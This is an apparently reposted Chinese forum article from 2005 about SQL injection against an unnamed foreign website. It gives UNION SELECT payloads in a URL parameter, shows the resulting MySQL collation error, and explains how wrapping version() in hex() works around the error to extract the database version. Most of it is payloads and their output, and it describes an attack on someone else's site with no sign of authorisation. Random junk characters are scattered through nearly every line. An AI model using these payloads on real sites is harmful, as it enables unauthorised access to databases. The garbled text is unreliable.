本文作者:SuperHei
( H) s4 x! R8 { {; b7 _3 w# i7 A& X文章性质:原创
% S, c8 a$ x+ }& K发布日期:2005-10-18
4 P. G9 t# Q L% y6 X测试个国外的站时:
. R! L" a0 O* J0 t( k# }* @; e( Hurl:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*1 n0 {4 P. Y! `) C2 {; b9 v
返回错误:
" t' g# {6 V. v* lIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION' c( B% M5 K( S5 [ X0 i3 Z
MySQL Error No. 126
K6 f* \ k( \看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。1 B0 Z% N. F8 i9 a3 O
解决办法:转为其他编码如hex。
9 l5 l0 S& n T* O) D t: h @. turl:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*3 `0 e$ e6 t& j6 H
成功得到hex(version())的值为:
: t- q/ w- s- M342E312E332D62657461+ {, `6 N; A4 T) ^( ~4 ~+ f! I% `2 [
回Mysql查询下得到:& f, d G. B$ ^; Q
mysql> select 0x342E312E332D62657461;( _" W7 P, S3 w* T: p1 ?6 `
+------------------------+$ k5 ~1 @2 m3 @( F
| 0x342E312E332D62657461 |) v: V$ F0 a; c& P& S0 E0 R" V
+------------------------+
" @( E* l% p/ [4 p9 T* j| 4.1.3-beta |" Q7 e( z4 o+ j6 m! P: V
+------------------------+
3 G3 D/ ]0 d9 p' @' G1 row in set (0.00 sec)
5 a% M0 Y* I! E, P% l' h7 h3 I$ O" g' _
|
发表于 2012-9-15 14:04:54
收藏
支持
反对